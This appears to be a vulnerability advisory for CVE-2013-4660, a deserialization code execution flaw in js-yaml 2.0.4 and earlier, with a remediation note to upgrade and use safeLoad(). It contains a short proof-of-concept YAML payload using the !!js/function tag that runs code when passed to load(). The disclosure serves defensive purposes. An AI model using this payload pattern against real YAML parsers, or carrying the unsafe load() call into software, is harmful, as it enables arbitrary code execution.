UNKNOWN npm

Deserialization Code Execution in js-yaml

GHSA-xxvw-45rp-3mj2 · CVE-2013-4660

Published · Modified

Description

Versions 2.0.4 and earlier of js-yaml are affected by a code execution vulnerability in the YAML deserializer.

Proof of Concept

const yaml = require('js-yaml');

const x = `test: !!js/function >
function f() { 
console.log(1); 
}();`

yaml.load(x);

Recommendation

Update js-yaml to version 2.0.5 or later, and ensure that all instances where the .load() method is called are updated to use .safeLoad() instead.

Ready to move

Start Securing

Free, no credit card | First findings in minutes